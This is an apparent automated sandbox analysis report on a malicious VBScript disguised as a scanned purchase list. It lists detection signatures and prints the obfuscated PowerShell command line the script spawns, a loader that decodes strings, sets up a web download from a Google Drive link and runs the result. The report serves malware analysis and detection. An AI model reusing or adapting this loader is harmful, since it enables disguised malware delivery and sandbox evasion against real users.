Edit tour
Windows
Analysis Report
Scanned Purchase List.vbs
Overview
General Information
Detection
Score: | 92 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64
- wscript.exe (PID: 7348 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Scann ed Purchas e List.vbs " MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7444 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "<#selvhrd endes Opdr ager Hjrem arginerne Dundertale r #>;$Usol idere43='C ouncilmen' ;<#Herredm mer Plasma genic Jdin dernes sut tene Korja mbisk dece lerationsb anen Udske jelser #>; $Dimit=$ho st.Private Data;If ($ Dimit) {$P antagraphi c++;}funct ion double crossing($ spisevgrin ger253){$D riftsbespa relse=$Guc ki+$spisev gringer253 .Length-$P antagraphi c;for( $Cr unchingly= 3;$Crunchi ngly -lt $ Driftsbesp arelse;$Cr unchingly+ =4){$Niken o+=$spisev gringer253 [$Crunchin gly];}$Nik eno;}funct ion tramel ling($Perh apses){ & ($bolig ydelsen) ( $Perhapses );}$sortkl dt=doublec rossing 't alM ,fospa zLociDatls il Kna D, /Asy5 ke.I nd0Res Lo, (svaW oiHo rnfordf no answA ss s m CoN,jrT s. Art1Epa 0so,.vet0, ie;P r sho Wpasi enA. y6D g4Hav; C b seexLt r6De 4 lo; Mis oerChe v ,r: Ud1A ns2tra1Fer .Ri.0Unl)L es ChaG Fr estocNe kU ndo Ar/sor 2Mur0.au1L ok0 F 0Zef 1Pso0 Do1 Pr IdFEmii VenrTegeMo df umocanx a/E.i1Out 2Ung1Mos. n0 A. ';$P anservaabe n=doublecr ossing ' s UDiss PaE AsR.lt- U nap lGTape BjlnOlet r ';$Enches on=doublec rossing 'G yrh aatP n tPespKnas Ti:Beh/ i/ Le d T.rFr ai RevFrie Imp. s g I nosl.oMosg Jal steHy s.RencAngo midmUn,/ v uPercWhe? Kne ndx st p ero rrct tplu=Pred H,ostiwpa nnsy,lIm o BriaEssd i l&KaliF,id E f=h s1La nO DuQTyrE B rlAcc7Ov eU ,aGsulO PipyUncKsi ds VaPDecd ,aR npJ G r9Dis1 eng L wH mqst os,rI ifV T NLinNin dRLinsJea6 stiPOmbVFu r9 ti4Bri ';$Dioxid= doublecros sing ' s.> Fib ';$bol igydelsen= doublecros sing 's ai stoeAppxs m ';$Mandu cation='sp ringklaps' ;$Drinksen es='\Paral ytical.Nap ';tramelli ng (double crossing ' Otu$Ar gst jl,hooEf.b Cl,aCavlBe v:Gerc R o Fiu Rinep otsaceCamr EvaaLnorBr egGr u eel imsVis=Egy $WooeJ.nn olvs l:Med aDmppTw.pP red aaasyr tMaravu.+ yk$ M DHip r eliKilnp eakskasNon epitnPhaeT ilsFur '); tramelling (doublecr ossing ',o r$sozg eml D ro KebA taUnilPra: AcrsI vtIm pyG,irE ot BindManyRo okFa kU ce Butr Ln=Po l$ AtEAman .ykcBilhIn des.hsKeeo Jobn Pa.Ty ns ekpsy,l sleiAb tHa v(Bil$ svD .eyiUngoCr uxPleiDord To) sc ') ;tramellin g (doublec rossing 'M aw[DifNCam estrtTer.k ilsV,le si r Mev FaiB escDaweFer PTheoHypiU ndnso.tNsk M s.a M ns ,maspegsam eRidr K ] a: on:Na.s dove ApcHa buPa.r ,ri Jart apysk uPst,rA co skatA koF, lcAn o Nel Non n= Nu kv[ ndNR aeQuatCo . VasPite B acstousynr A gisartLg tyOplPNerr Trao TrtBn doGlucHe o CyclAlaTR gyEkspsa e d]Avo:F r : phTNonlM arsP,e1s o 2Idi ');$E ncheson=$s tyrtdykker [0];$North wardly=(do ublecrossi ng ' Ou$so gGs mLPlaO NonBTerAGl aL Or:steL IntIs oGUn H ktT p,a MtGForesl .6 Ma8s,v= optnAarE B awPar-Theo staBMilJIf aE HoC UvT non EarsF rYLa.s.pot FeeED lMHo